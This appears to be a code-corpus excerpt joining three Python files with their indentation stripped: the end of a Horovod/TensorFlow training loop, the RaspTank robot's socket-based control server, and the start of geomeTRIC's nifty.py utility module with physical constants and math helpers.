train_enqueue_thread.daemon = True # Ensure we exit the program on an excpetion
print("Start training!")
batch_time = 0
train_dict = {is_train: True}
eval_dict = {is_train: False}
try:
train_enqueue_thread.start()
for epoch in range(train_params.num_epochs):
for batch_ix in range(len(train)):
t0 = time.perf_counter()
on_step = sess.run(global_step) + 1
get_summary = on_step % train_params.log_period == 0
if get_summary:
summary, _, batch_loss = sess.run([summary_tensor, train_opt, loss], feed_dict=train_dict)
else:
summary = None
_, batch_loss = sess.run([train_opt, loss], feed_dict=train_dict)
if np.isnan(batch_loss):
raise RuntimeError("NaN loss!")
batch_time += time.perf_counter() - t0
if hvd.rank() == 0:
if summary is not None:
print("on epoch=%d batch=%d step=%d, time=%.3f" %
(epoch, batch_ix + 1, on_step, batch_time))
summary_writer.add_summary(
tf.Summary(value=[tf.Summary.Value(tag="time", simple_value=batch_time)]), on_step)
summary_writer.add_summary(summary, on_step)
batch_time = 0
# occasional saving
if hvd.rank() == 0:
if on_step % train_params.save_period == 0:
print("Checkpointing")
saver.save(sess, join(out.save_dir, "checkpoint-" + str(on_step)), global_step=global_step)
# Occasional evaluation
if (on_step % train_params.eval_period == 0) or start_eval:
print("Running evaluation...")
start_eval = False
t0 = time.perf_counter()
for name, data in eval_datasets.items():
n_samples = train_params.eval_samples.get(name)
evaluation = evaluator_runner.run_evaluators(sess, data, name, n_samples, eval_dict)
if hvd.rank() == 0:
for s in evaluation.to_summaries(name + "-"):
summary_writer.add_summary(s, on_step)
# Maybe save as the best weights
if train_params.best_weights is not None and name == train_params.best_weights[0]:
val = evaluation.scalars[train_params.best_weights[1]]
if cur_best is None or val > cur_best:
print("Save weights with current best weights (%s vs %.5f)" % (
"None" if cur_best is None else ("%.5f" % cur_best), val))
best_weight_saver.save(sess, join(out.best_weight_dir, "best"), global_step=global_step)
cur_best = val
print("Evaluation took: %.3f seconds" % (time.perf_counter() - t0))
finally:
sess.run(train_close) # terminates the enqueue thread with an exception
train_enqueue_thread.join()
saver.save(sess, relpath(join(out.save_dir, "checkpoint-" + str(on_step))), global_step=global_step)
sess.close()
trainer._build_train_ops = _build_train_ops
trainer._train = _train
trainer._train_async = _train_async
|
server.py | #!/usr/bin/env/python
# File name : server.py
# Production : RaspTank
# Website : www.adeept.com
# E-mail : support@adeept.com
# Author : William
# Date : 2018/08/22
import socket
import time
import threading
import move
import Adafruit_PCA9685
pwm = Adafruit_PCA9685.PCA9685()
pwm.set_pwm_freq(50)
pwm.set_all_pwm(0,300)
from rpi_ws281x import *
import argparse
import os
import ultra
import FPV
import psutil
import servo
import LED
import findline
step_set = 1
speed_set = 100
rad = 0.6
new_frame = 0
direction_command = 'no'
turn_command = 'no'
#pwm = Adafruit_PCA9685.PCA9685()
#pwm.set_pwm_freq(50)
pos_input = 1
catch_input = 1
cir_input = 6
ultrasonicMode = 0
FindLineMode = 0
FindColorMode = 0
def app_ctrl():
app_HOST = ''
app_PORT = 10123
app_BUFSIZ = 1024
app_ADDR = (app_HOST, app_PORT)
AppSerSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
AppSerSock.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
AppSerSock.bind(app_ADDR)
def setup():
move.setup()
def appCommand(data_input):
global direction_command, turn_command, pos_input, catch_input, cir_input
if data_input == 'forwardStart\n':
direction_command = 'forward'
move.move(speed_set, direction_command, turn_command, rad)
elif data_input == 'backwardStart\n':
direction_command = 'backward'
move.move(speed_set, direction_command, turn_command, rad)
elif data_input == 'leftStart\n':
turn_command = 'left'
move.move(speed_set, direction_command, turn_command, rad)
elif data_input == 'rightStart\n':
turn_command = 'right'
move.move(speed_set, direction_command, turn_command, rad)
elif 'forwardStop' in data_input:
direction_command = 'no'
move.move(speed_set, direction_command, turn_command, rad)
elif 'backwardStop' in data_input:
direction_command = 'no'
move.move(speed_set, direction_command, turn_command, rad)
elif 'leftStop' in data_input:
turn_command = 'no'
move.move(speed_set, direction_command, turn_command, rad)
elif 'rightStop' in data_input:
turn_command = 'no'
move.move(speed_set, direction_command, turn_command, rad)
if data_input == 'lookLeftStart\n':
if cir_input < 12:
cir_input+=1
servo.cir_pos(cir_input)
elif data_input == 'lookRightStart\n':
if cir_input > 1:
cir_input-=1
servo.cir_pos(cir_input)
elif data_input == 'downStart\n':
servo.camera_ang('lookdown',10)
elif data_input == 'upStart\n':
servo.camera_ang('lookup',10)
elif 'lookLeftStop' in data_input:
pass
elif 'lookRightStop' in data_input:
pass
elif 'downStop' in data_input:
pass
elif 'upStop' in data_input:
pass
if data_input == 'aStart\n':
if pos_input < 17:
pos_input+=1
servo.hand_pos(pos_input)
elif data_input == 'bStart\n':
if pos_input > 1:
pos_input-=1
servo.hand_pos(pos_input)
elif data_input == 'cStart\n':
if catch_input < 13:
catch_input+=3
servo.catch(catch_input)
elif data_input == 'dStart\n':
if catch_input > 1:
catch_input-=3
servo.catch(catch_input)
elif 'aStop' in data_input:
pass
elif 'bStop' in data_input:
pass
elif 'cStop' in data_input:
pass
elif 'dStop' in data_input:
pass
print(data_input)
def appconnect():
global AppCliSock, AppAddr
AppSerSock.listen(5)
print('waiting for App connection...')
AppCliSock, AppAddr = AppSerSock.accept()
print('...App connected from :', AppAddr)
appconnect()
setup()
app_threading=threading.Thread(target=appconnect) #Define a thread for FPV and OpenCV
app_threading.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
app_threading.start() #Thread starts
while 1:
data = ''
data = str(AppCliSock.recv(app_BUFSIZ).decode())
if not data:
continue
appCommand(data)
pass
AppConntect_threading=threading.Thread(target=app_ctrl) #Define a thread for FPV and OpenCV
AppConntect_threading.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
AppConntect_threading.start() #Thread starts
def findline_thread(): #Line tracking mode
while 1:
while FindLineMode:
findline.run()
time.sleep(0.2)
def get_cpu_tempfunc():
""" Return CPU temperature """
result = 0
mypath = "/sys/class/thermal/thermal_zone0/temp"
with open(mypath, 'r') as mytmpfile:
for line in mytmpfile:
result = line
result = float(result)/1000
result = round(result, 1)
return str(result)
def get_gpu_tempfunc():
""" Return GPU temperature as a character string"""
res = os.popen('/opt/vc/bin/vcgencmd measure_temp').readline()
return res.replace("temp=", "")
def get_cpu_use():
""" Return CPU usage using psutil"""
cpu_cent = psutil.cpu_percent()
return str(cpu_cent)
def get_ram_info():
""" Return RAM usage using psutil """
ram_cent = psutil.virtual_memory()[2]
return str(ram_cent)
def get_swap_info():
""" Return swap memory usage using psutil """
swap_cent = psutil.swap_memory()[3]
return str(swap_cent)
def info_get():
global cpu_t,cpu_u,gpu_t,ram_info
while 1:
cpu_t = get_cpu_tempfunc()
cpu_u = get_cpu_use()
ram_info = get_ram_info()
time.sleep(3)
def info_send_client():
SERVER_IP = addr[0]
SERVER_PORT = 2256 #Define port serial
SERVER_ADDR = (SERVER_IP, SERVER_PORT)
Info_Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #Set connection value for socket
Info_Socket.connect(SERVER_ADDR)
print(SERVER_ADDR)
while 1:
try:
Info_Socket.send((get_cpu_tempfunc()+' '+get_cpu_use()+' '+get_ram_info()).encode())
time.sleep(1)
except:
pass
def ultra_send_client():
ultra_IP = addr[0]
ultra_PORT = 2257 #Define port serial
ultra_ADDR = (ultra_IP, ultra_PORT)
ultra_Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #Set connection value for socket
ultra_Socket.connect(ultra_ADDR)
print(ultra_ADDR)
while 1:
while ultrasonicMode:
try:
if not FindColorMode:
ultra_Socket.send(str(round(ultra.checkdist(),2)).encode())
time.sleep(0.5)
continue
fpv.UltraData(round(ultra.checkdist(),2))
time.sleep(0.2)
except:
pass
time.sleep(0.5)
def FPV_thread():
fpv=FPV.FPV()
fpv.capture_thread(addr[0])
def ap_thread():
os.system("sudo create_ap wlan0 eth0 AdeeptCar 12345678")
def run():
global direction_command, turn_command, pos_input, catch_input, cir_input, ultrasonicMode, FindLineMode, FindColorMode
move.setup()
findline.setup()
info_threading=threading.Thread(target=info_send_client) #Define a thread for FPV and OpenCV
info_threading.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
info_threading.start() #Thread starts
ultra_threading=threading.Thread(target=ultra_send_client) #Define a thread for FPV and OpenCV
ultra_threading.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
ultra_threading.start() #Thread starts
findline_threading=threading.Thread(target=findline_thread) #Define a thread for FPV and OpenCV
findline_threading.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
findline_threading.start() #Thread starts
#move.stand()
ws_R = 0
ws_G = 0
ws_B = 0
Y_pitch = 0
Y_pitch_MAX = 200
Y_pitch_MIN = -200
while True:
data = ''
data = str(tcpCliSock.recv(BUFSIZ).decode())
if not data:
continue
elif 'forward' == data:
direction_command = 'forward'
move.move(speed_set, direction_command, turn_command, rad)
elif 'backward' == data:
direction_command = 'backward'
move.move(speed_set, direction_command, turn_command, rad)
elif 'DS' in data:
direction_command = 'no'
move.move(speed_set, direction_command, turn_command, rad)
elif 'left' == data:
turn_command = 'left'
move.move(speed_set, direction_command, turn_command, rad)
elif 'right' == data:
turn_command = 'right'
move.move(speed_set, direction_command, turn_command, rad)
elif 'TS' in data:
turn_command = 'no'
move.move(speed_set, direction_command, turn_command, rad)
elif 'out' == data:
if pos_input < 17:
pos_input+=1
servo.hand_pos(pos_input)
elif 'in' == data:
if pos_input > 1:
pos_input-=1
servo.hand_pos(pos_input)
elif 'headup' == data:
servo.camera_ang('lookup',0)
elif 'headdown' == data:
servo.camera_ang('lookdown',0)
elif 'headhome' == data:
servo.initPosAll()
elif 'c_left' == data:
if cir_input < 12:
cir_input+=1
servo.cir_pos(cir_input)
elif 'c_right' == data:
if cir_input > 1:
cir_input-=1
servo.cir_pos(cir_input)
elif 'catch' == data:
if catch_input < 13:
catch_input+=1
servo.catch(catch_input)
elif 'loose' == data:
if catch_input > 1:
catch_input-=1
servo.catch(catch_input)
elif 'wsR' in data:
try:
set_R=data.split()
ws_R = int(set_R[1])
LED.colorWipe(ws_R,ws_G,ws_B)
except:
pass
elif 'wsG' in data:
try:
set_G=data.split()
ws_G = int(set_G[1])
LED.colorWipe(ws_R,ws_G,ws_B)
except:
pass
elif 'wsB' in data:
try:
set_B=data.split()
ws_B = int(set_B[1])
LED.colorWipe(ws_R,ws_G,ws_B)
except:
pass
elif 'FindColor' in data:
fpv.FindColor(1)
FindColorMode = 1
ultrasonicMode = 1
tcpCliSock.send(('FindColor').encode())
elif 'WatchDog' in data:
fpv.WatchDog(1)
tcpCliSock.send(('WatchDog').encode())
elif 'steady' in data:
ultrasonicMode = 1
tcpCliSock.send(('steady').encode())
elif 'FindLine' in data:
FindLineMode = 1
tcpCliSock.send(('FindLine').encode())
elif 'funEnd' in data:
fpv.FindColor(0)
fpv.WatchDog(0)
ultrasonicMode = 0
FindLineMode = 0
FindColorMode = 0
tcpCliSock.send(('FunEnd').encode())
move.motorStop()
time.sleep(0.3)
move.motorStop()
else:
pass
#print(data)
if __name__ == '__main__':
HOST = ''
PORT = 10223 #Define port serial
BUFSIZ = 1024 #Define buffer size
ADDR = (HOST, PORT)
pwm.set_all_pwm(0,300)
try:
LED = LED.LED()
LED.colorWipe(255,16,0)
except:
print('Use "sudo pip3 install rpi_ws281x" to install WS_281x package')
pass
while 1:
try:
s =socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
s.connect(("1.1.1.1",80))
ipaddr_check=s.getsockname()[0]
s.close()
print(ipaddr_check)
except:
ap_threading=threading.Thread(target=ap_thread) #Define a thread for data receiving
ap_threading.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
ap_threading.start() #Thread starts
LED.colorWipe(0,16,50)
time.sleep(1)
LED.colorWipe(0,16,100)
time.sleep(1)
LED.colorWipe(0,16,150)
time.sleep(1)
LED.colorWipe(0,16,200)
time.sleep(1)
LED.colorWipe(0,16,255)
time.sleep(1)
LED.colorWipe(35,255,35)
try:
tcpSerSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tcpSerSock.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
tcpSerSock.bind(ADDR)
tcpSerSock.listen(5) #Start server,waiting for client
print('waiting for connection...')
tcpCliSock, addr = tcpSerSock.accept()
print('...connected from :', addr)
fpv=FPV.FPV()
fps_threading=threading.Thread(target=FPV_thread) #Define a thread for FPV and OpenCV
fps_threading.setDaemon(True) #'True' means it is a front thread,it would close when the mainloop() closes
fps_threading.start() #Thread starts
break
except:
LED.colorWipe(0,0,0)
try:
LED.colorWipe(0,80,255)
except:
pass
run()
try:
pwm.set_all_pwm(0,0)
run()
except:
LED.colorWipe(0,0,0)
servo.clean_all()
move.destroy()
|
nifty.py |
"""@package geometric.nifty Nifty functions, originally intended to be imported by any module within ForceBalance.
This file was copied over from ForceBalance to geomeTRIC in order to lighten the dependencies of the latter.
Table of Contents:
- I/O formatting
- Math: Variable manipulation, linear algebra, least squares polynomial fitting
- Pickle: Expand Python's own pickle to accommodate writing XML etree objects
- Commands for submitting things to the Work Queue
- Various file and process management functions
- Development stuff (not commonly used)
Named after the mighty Sniffy Handy Nifty (King Sniffy)
@author Lee-Ping Wang
@date 2018-03-10
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import filecmp
import itertools
import distutils.dir_util
import os
import re
import shutil
import sys
from select import select
import numpy as np
from numpy.linalg import multi_dot
# For Python 3 compatibility
try:
from itertools import zip_longest as zip_longest
except ImportError:
from itertools import izip_longest as zip_longest
import threading
from pickle import Pickler, Unpickler
import tarfile
import time
import subprocess
import math
import six # For six.string_types
from subprocess import PIPE
from collections import OrderedDict, defaultdict
#================================#
# Set up the logger #
#================================#
if "forcebalance" in __name__:
# If this module is part of ForceBalance, use the package level logger
from .output import *
package="ForceBalance"
else:
from logging import *
# Define two handlers that don't print newline characters at the end of each line
class RawStreamHandler(StreamHandler):
"""
Exactly like StreamHandler, except no newline character is printed at the end of each message.
This is done in order to ensure functions in molecule.py and nifty.py work consistently
across multiple packages.
"""
def __init__(self, stream = sys.stdout):
super(RawStreamHandler, self).__init__(stream)
def emit(self, record):
message = record.getMessage()
self.stream.write(message)
self.flush()
class RawFileHandler(FileHandler):
"""
Exactly like FileHandler, except no newline character is printed at the end of each message.
This is done in order to ensure functions in molecule.py and nifty.py work consistently
across multiple packages.
"""
def __init__(self, *args, **kwargs):
super(RawFileHandler, self).__init__(*args, **kwargs)
def emit(self, record):
if self.stream is None:
self.stream = self._open()
message = record.getMessage()
self.stream.write(message)
self.flush()
if "geometric" in __name__:
# This ensures logging behavior is consistent with the rest of geomeTRIC
logger = getLogger(__name__)
logger.setLevel(INFO)
package="geomeTRIC"
else:
logger = getLogger("NiftyLogger")
logger.setLevel(INFO)
handler = RawStreamHandler()
logger.addHandler(handler)
if __name__ == "__main__":
package = "LPW-nifty.py"
else:
package = __name__.split('.')[0]
try:
import bz2
HaveBZ2 = True
except ImportError:
logger.warning("bz2 module import failed (used in compressing or decompressing pickle files)\n")
HaveBZ2 = False
try:
import gzip
HaveGZ = True
except ImportError:
logger.warning("gzip module import failed (used in compressing or decompressing pickle files)\n")
HaveGZ = False
# The directory that this file lives in
rootdir = os.path.dirname(os.path.abspath(__file__))
# On 2020-05-07, these values were revised to CODATA 2018 values
# hartree-joule relationship 4.359 744 722 2071(85) e-18
# Hartree energy in eV 27.211 386 245 988(53)
# Avogadro constant 6.022 140 76 e23 (exact)
# molar gas constant 8.314 462 618 (exact)
# Boltzmann constant 1.380649e-23 (exact)
# Bohr radius 5.291 772 109 03(80) e-11
# speed of light in vacuum 299 792 458 (exact)
# reduced Planck's constant 1.054571817e-34 (exact)
# calorie-joule relationship 4.184 J (exact; from NIST)
## Boltzmann constant in kJ mol^-1 k^-1
kb = 0.008314462618 # Previous value: 0.0083144100163
kb_si = 1.380649e-23
# Conversion factors
bohr2ang = 0.529177210903 # Previous value: 0.529177210
ang2bohr = 1.0 / bohr2ang
au2kcal = 627.5094740630558 # Previous value: 627.5096080306
kcal2au = 1.0 / au2kcal
au2kj = 2625.4996394798254 # Previous value: 2625.5002
kj2au = 1.0 / au2kj
grad_au2gmx = 49614.75258920567 # Previous value: 49614.75960959161
grad_gmx2au = 1.0 / grad_au2gmx
au2evang = 51.422067476325886 # Previous value: 51.42209166566339
evang2au = 1.0 / au2evang
c_lightspeed = 299792458.
hbar = 1.054571817e-34
avogadro = 6.02214076e23
au_mass = 9.1093837015e-31 # Atomic unit of mass in kg
amu_mass = 1.66053906660e-27 # Atomic mass unit in kg
amu2au = amu_mass / au_mass
cm2au = 100 * c_lightspeed * (2*np.pi*hbar) * avogadro / 1000 / au2kj # Multiply to convert cm^-1 to Hartree
ambervel2au = 9.349961132249932e-04 # Multiply to go from AMBER velocity unit Ang/(1/20.455 ps) to bohr/atu.
## Q-Chem to GMX unit conversion for energy
eqcgmx = au2kj # Previous value: 2625.5002
## Q-Chem to GMX unit conversion for force
fqcgmx = -grad_au2gmx # Previous value: -49621.9
#=========================#
# I/O formatting #
#=========================#
# These functions may be useful someday but I have not tested them
# def bzip2(src):
# dest = src+'.bz2'
# if not os.path.exists(src):
# logger.error('File to be compressed does not exist')
# raise RuntimeError
# if os.path.exists(dest):
# logger.error('Archive to be created already exists')
# raise RuntimeError
# with open(src, 'rb') as input:
# with bz2.BZ2File(dest, 'wb', compresslevel=9) as output:
# copyfileobj(input, output)
# os.remove(input)
# def bunzip2(src):
# dest = re.sub('\.bz2$', '', src)
# if not os.path.exists(src):
# logger.error('File to be decompressed does not exist')
# raise RuntimeError
# if os.path.exists(dest):
# logger.error('Target path for decompression already exists')
# raise RuntimeError
# with bz2.BZ2File(src, 'rb', compresslevel=9) as input:
# with open(dest, 'wb') as output:
# copyfileobj(input, output)
# os.remove(input)
def pvec1d(vec1d, precision=1, format="e", loglevel=INFO):
"""Printout of a 1-D vector.
@param[in] vec1d a 1-D vector
"""
v2a = np.array(vec1d)
for i in range(v2a.shape[0]):
logger.log(loglevel, "%% .%i%s " % (precision, format) % v2a[i])
logger.log(loglevel, '\n')
def astr(vec1d, precision=4):
""" Write an array to a string so we can use it to key a dictionary. """
return ' '.join([("%% .%ie " % precision % i) for i in vec1d])
def pmat2d(mat2d, precision=1, format="e", loglevel=INFO):
"""Printout of a 2-D array.
@param[in] mat2d a 2-D array
"""
m2a = np.array(mat2d)
for i in range(m2a.shape[0]):
for j in range(m2a.shape[1]):
logger.log(loglevel, "%% .%i%s " % (precision, format) % m2a[i][j])
logger.log(loglevel, '\n')
def grouper(iterable, n):
"""Collect data into fixed-length chunks or blocks"""
# grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx
args = [iter(iterable)] * n
lzip = [[j for j in i if j is not None] for i in list(zip_longest(*args))]
return lzip
def encode(l):
return [[len(list(group)),name] for name, group in itertools.groupby(l)]
def segments(e):
# Takes encoded input.
begins = np.array([sum([k[0] for k in e][:j]) for j,i in enumerate(e) if i[1] == 1])
lens = np.array([i[0] for i in e if i[1] == 1])
return [(i, i+j) for i, j in zip(begins, lens)]
def commadash(l):
# Formats a list like [27, 28, 29, 30, 31, 88, 89, 90, 91, 100, 136, 137, 138, 139]
# into '27-31,88-91,100,136-139
L = sorted(l)
if len(L) == 0:
return "(empty)"
L.append(L[-1]+1)
LL = [i in L for i in range(L[-1])]
return ','.join('%i-%i' % (i[0]+1,i[1]) if (i[1]-1 > i[0]) else '%i' % (i[0]+1) for i in segments(encode(LL)))
def uncommadash(s):
# Takes a string like '27-31,88-91,100,136-139'
# and turns it into a list like [26, 27, 28, 29, 30, 87, 88, 89, 90, 99, 135, 136, 137, 138]
L = []
try:
for w in s.split(','):
ws = w.split('-')
a = int(ws[0])-1
if len(ws) == 1:
b = int(ws[0])
elif len(ws) == 2:
b = int(ws[1])
else:
logger.warning("Dash-separated list cannot exceed length 2\n")
raise
if a < 0 or b <= 0 or b <= a:
if a < 0 or b <= 0:
logger.warning("Items in list cannot be zero or negative: %d %d\n" % (a, b))
else:
logger.warning("Second number cannot be smaller than first: %d %d\n" % (a, b))
raise
newL = range(a,b)
if any([i in L for i in newL]):
logger.warning("Duplicate entries found in list\n")
raise
L += newL
if sorted(L) != L:
logger.warning("List is out of order\n")
raise
except:
logger.error('Invalid string for converting to list of numbers: %s\n' % s)
raise RuntimeError
return L
def natural_sort(l):
""" Return a natural sorted list. """
# Convert a character to a digit or a lowercase character
convert = lambda text: int(text) if text.isdigit() else text.lower()
# Split string into "integer" and "noninteger" fields and convert each one
alphanum_key = lambda key: [ convert(c) for c in re.split('([0-9]+)', key) ]
# Sort strings using these keys in descending order of importance, I guess.
return sorted(l, key = alphanum_key)
def printcool(text,sym="#",bold=False,color=2,ansi=None,bottom='-',minwidth=50,center=True,sym2="="):
"""Cool-looking printout for slick formatting of output.
@param[in] text The string that the printout is based upon. This function
will print out the string, ANSI-colored and enclosed in the symbol
for example:\n
<tt> ################# </tt>\n
<tt> ### I am cool ### </tt>\n
<tt> ################# </tt>
@param[in] sym The surrounding symbol\n
@param[in] bold Whether to use bold print
@param[in] color The ANSI color:\n
1 red\n
2 green\n
3 yellow\n
4 blue\n
5 magenta\n
6 cyan\n
7 white
@param[in] bottom The symbol for the bottom bar
@param[in] minwidth The minimum width for the box, if the text is very short
then we insert the appropriate number of padding spaces
@return bar The bottom bar is returned for the user to print later, e.g. to mark off a 'section'
"""
def newlen(l):
return len(re.sub(r"\x1b\[[0-9;]*m","",l))
text = text.split('\n')
width = max(minwidth,max([newlen(line) for line in text]))
bar = ''.join([sym2 for i in range(width + 6)])
bar = sym + bar + sym
#bar = ''.join([sym for i in range(width + 8)])
logger.info('\r'+bar + '\n')
for ln, line in enumerate(text):
if type(center) is list: c1 = center[ln]
else: c1 = center
if c1:
padleft = ' ' * (int((width - newlen(line))/2))
else:
padleft = ''
padright = ' '* (width - newlen(line) - len(padleft))
if ansi is not None:
ansi = str(ansi)
logger.info("%s| \x1b[%sm%s " % (sym, ansi, padleft)+line+" %s\x1b[0m |%s\n" % (padright, sym))
elif color is not None:
if color == 0 and bold:
logger.info("%s| \x1b[1m%s " % (sym, padleft) + line + " %s\x1b[0m |%s\n" % (padright, sym))
elif color == 0:
logger.info("%s| %s " % (sym, padleft)+line+" %s |%s\n" % (padright, sym))
else:
logger.info("%s| \x1b[%s9%im%s " % (sym, bold and "1;" or "", color, padleft)+line+" %s\x1b[0m |%s\n" % (padright, sym))
# if color == 3 or color == 7:
# print "%s\x1b[40m\x1b[%s9%im%s" % (''.join([sym for i in range(3)]), bold and "1;" or "", color, padleft),line,"%s\x1b[0m%s" % (padright, ''.join([sym for i in range(3)]))
# else:
# print "%s\x1b[%s9%im%s" % (''.join([sym for i in range(3)]), bold and "1;" or "", color, padleft),line,"%s\x1b[0m%s" % (padright, ''.join([sym for i in range(3)]))
else:
warn_press_key("Inappropriate use of printcool")
logger.info(bar + '\n')
botbar = ''.join([bottom for i in range(width + 8)])
return botbar + '\n'
def printcool_dictionary(Dict,title="Dictionary Keys : Values",bold=False,color=2,keywidth=25,topwidth=50,center=True,leftpad=0):
"""See documentation for printcool; this is a nice way to print out keys/values in a dictionary.
The keys in the dictionary are sorted before printing out.
@param[in] dict The dictionary to be printed
@param[in] title The title of the printout
"""
if Dict is None: return
bar = printcool(title,bold=bold,color=color,minwidth=topwidth,center=center)
def magic_string(str):
# This cryptic command returns a string with the number of characters specified as a variable. :P
# Useful for printing nice-looking dictionaries, i guess.
# print "\'%%-%is\' %% '%s'" % (keywidth,str.replace("'","\\'").replace('"','\\"'))
return eval("\'%%-%is\' %% '%s'" % (keywidth,str.replace("'","\\'").replace('"','\\"')))
if isinstance(Dict, OrderedDict):
logger.info('\n'.join([' '*leftpad + "%s %s " % (magic_string(str(key)),str(Dict[key])) for key in Dict if Dict[key] is not None]))
else:
logger.info('\n'.join([' '*leftpad + "%s %s " % (magic_string(str(key)),str(Dict[key])) for key in sorted([i for i in Dict]) if Dict[key] is not None]))
logger.info("\n%s" % bar)
#===============================#
#| Math: Variable manipulation |#
#===============================#
def isint(word):
"""ONLY matches integers! If you have a decimal point? None shall pass!
@param[in] word String (for instance, '123', '153.0', '2.', '-354')
@return answer Boolean which specifies whether the string is an integer (only +/- sign followed by digits)
"""
try:
word = str(word)
except:
return False
return re.match('^[-+]?[0-9]+$', word)
def isfloat(word):
"""Matches ANY number; it can be a decimal, scientific notation, what have you
CAUTION - this will also match an integer.
@param[in] word String (for instance, '123', '153.0', '2.', '-354')
@return answer Boolean which specifies whether the string is any number
"""
try: word = str(word)
except: return False
if len(word) == 0: return False
return re.match(r'^[-+]?[0-9]*\.?[0-9]*([eEdD][-+]?[0-9]+)?$',word)
def isdecimal(word):
"""Matches things with a decimal only; see isint and isfloat.
@param[in] word String (for instance, '123', '153.0', '2.', '-354')
@return answer Boolean which specifies whether the string is a number with a decimal point
"""
try: word = str(word)
except: return False
return isfloat(word) and not isint(word)
def floatornan(word):
"""Returns a big number if we encounter NaN.
@param[in] word The string to be converted
@return answer The string converted to a float; if not a float, return 1e10
@todo I could use suggestions for making this better.
"""
big = 1e10
if isfloat(word):
return float(word)
else:
logger.info("Setting %s to % .1e\n" % big)
return big
def col(vec):
"""
Given any list, array, or matrix, return a 1-column 2D array.
Input:
vec = The input vector that is to be made into a column
Output:
A 1-column 2D array
"""
return np.array(vec).reshape(-1, 1)
def row(vec):
"""Given any list, array, or matrix, return a 1-row 2D array.
@param[in] vec The input vector that is to be made into a row
@return answer A 1-row 2D array
"""
return np.array(vec).reshape(1, -1)
def flat(vec):
"""Given any list, array, or matrix, return a single-index array.
@param[in] vec The data to be flattened
@return answer The flattened data
"""
return np.array(vec).reshape(-1)
def est124(val):
"""Given any positive floating point value, return a value [124]e+xx
that is closest to it in the log space.
"""
log = np.log10(val)
logint = math.floor(log)
logfrac = log - logint
log1 = 0.0
log2 = 0.3010299956639812
log4 = 0.6020599913279624
log10 = 1.0
if logfrac < 0.5*(log1+log2):
fac = 1.0
elif logfrac < 0.5*(log2+log4):
fac = 2.0
elif logfrac < 0.5*(log4+log10):
fac = 4.0
else:
fac = 10.0
return fac*10**logint
def est1234568(val):
"""Given any positive floating point value, return a value [1234568]e+xx
that is closest to it in the log space. Just because I don't like seven
and nine. Call me a numberist?
"""
log = np.log10(val)
logint = math.floor(log)
logfrac = log - logint
log1 = 0.0
log2 = 0.3010299956639812
log3 = np.log10(3)
log4 = 0.6020599913279624
log5 = np.log10(5)
log6 = np.log10(6)
log8 = np.log10(8)
log10 = 1.0
if logfrac < 0.5*(log1+log2):
fac = 1.0
elif logfrac < 0.5*(log2+log3):
fac = 2.0
elif logfrac < 0.5*(log3+log4):
fac = 3.0
elif logfrac < 0.5*(log4+log5):
fac = 4.0
elif logfrac < 0.5*(log5+log6):
fac = 5.0
elif logfrac < 0.5*(log6+log8):
fac = 6.0
elif logfrac < 0.5*(log8+log10):
fac = 8.0
else:
fac = 10.0
return fac*10**logint
def monotonic(arr, start, end):
# Make sure an array is monotonically decreasing from the start to the end.
a0 = arr[start]
i0 = start
if end > start:
i = start+1
while i < end:
if arr[i] < a0:
arr[i0:i+1] = np.linspace(a0, arr[i], i-i0+1)
a0 = arr[i]
i0 = i
i += 1
if end < start:
i = start-1
while i >= end:
if arr[i] < a0:
arr[i:i0+1] = np.linspace(arr[i], a0, i0-i+1)
a0 = arr[i]
i0 = i
i -= 1
def monotonic_decreasing(arr, start=None, end=None, verbose=False):
"""
Return the indices of an array corresponding to strictly monotonic
decreasing behavior.
Parameters
----------
arr : numpy.ndarray
Input array
start : int
Starting index (first element if None)
end : int
Ending index (last element if None)
Returns
-------
indices : numpy.ndarray
Selected indices
"""
if start is None:
start = 0
if end is None:
end = len(arr) - 1
a0 = arr[start]
idx = [start]
if verbose: logger.info("Starting @ %i : %.6f\n" % (start, arr[start]))
if end > start:
i = start+1
while i < end:
if arr[i] < a0:
a0 = arr[i]
idx.append(i)
if verbose: logger.info("Including %i : %.6f\n" % (i, arr[i]))
else:
if verbose: logger.info("Excluding %i : %.6f\n" % (i, arr[i]))
i += 1
if end < start:
i = start-1
while i >= end:
if arr[i] < a0:
a0 = arr[i]
idx.append(i)
if verbose: logger.info("Including %i : %.6f\n" % (i, arr[i]))
else:
if verbose: logger.info("Excluding %i : %.6f\n" % (i, arr[i]))
i -= 1
return np.array(idx)
#====================================#
#| Math: Vectors and linear algebra |#
#====================================#
def orthogonalize(vec1, vec2):
"""Given two vectors vec1 and vec2, project out the component of vec1
that is along the vec2-direction.
@param[in] vec1 The projectee (i.e. output is some modified version of vec1)
@param[in] vec2 The projector (component subtracted out from vec1 is parallel to this)
@return answer A copy of vec1 but with the vec2-component projected out.
"""
v2u = vec2/np.linalg.norm(vec2)
return vec1 - v2u*np.dot(vec1, v2u)
def invert_svd(X,thresh=1e-12):
"""
Invert a matrix using singular value decomposition.
@param[in] X The 2-D NumPy array containing the matrix to be inverted
@param[in] thresh The SVD threshold; eigenvalues below this are not inverted but set to zero
@return Xt The 2-D NumPy array containing the inverted matrix
"""
u,s,vh = np.linalg.svd(X, full_matrices=0)
uh = np.transpose(u)
v = np.transpose(vh)
si = s.copy()
for i in range(s.shape[0]):
if abs(s[i]) > thresh:
si[i] = 1./s[i]
else:
si[i] = 0.0
si = np.diag(si)
Xt = multi_dot([v, si, uh])
return Xt
#==============================#
#| Linear least squares |#
#==============================#
def get_least_squares(x, y, w = None, thresh=1e-12):
"""
@code
__ __
| |
| 1 (x0) (x0)^2 (x0)^3 |
| 1 (x1) (x1)^2 (x1)^3 |
| 1 (x2) (x2)^2 (x2)^3 |
| 1 (x3) (x3)^2 (x3)^3 |
| 1 (x4) (x4)^2 (x4)^3 |
|__ __|
@endcode
